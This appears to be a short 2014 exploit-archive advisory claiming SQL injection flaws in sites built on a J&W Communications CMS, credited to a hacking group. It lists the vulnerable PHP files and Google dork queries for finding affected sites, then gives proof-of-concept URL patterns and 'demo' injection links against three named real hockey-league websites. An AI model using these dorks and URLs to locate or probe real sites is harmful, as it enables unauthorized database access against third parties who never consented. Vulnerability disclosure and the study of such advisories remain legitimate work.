Sites created by J&W Communications appear to suffer from remote SQL injection vulnerabilities. Note that this finding houses site-specific data.
65f4085262255284edb648a36920c83ccae9bf601ad67291db7f5c7ac9a711b3
[+] Title: J&W Communications Cms SQL Injection Vulnerability
[+] Date: 2014-07-29
[+] Author: Hekt0r
[+] Vendor Homepage: www.jw-com.com
[+] Tested on: Windows7 & Kali Linux
[+] Vulnerable Files: /rosters.php
/team.php
/scoresheet.php
[+} Dork : intext:"designed by J&W Communications"
inurl:/team.php.php?id=
inurl:/rosters.php?id=
inurl:/scoresheet.php?sched_id=
### POC: http://site/team.php.php?id=[SQL-Injection]
http://site/rosters.php?id=[SQL-Injection]
http://site/scoresheet.php?sched_id=[SQL-Injection]
### Demo: http://www.ambhl.ab.ca/team.php?id=132%27
http://edmbantamtourney.com/rosters.php?id=19%27
http://www.pwnhl.ca/scoresheet.php?sched_id=44%27
### Credits:
[+] Special Thanks: Root SmasheR, Mr.Moein, UmPire, Ali Ahmady, Saeed.Jok3r
M4hdi, Black Hacker, Vahid Hαcĸer, BlackErroR,
Phantom.S3c
And All members of Iran Security Group
[+] iransec.net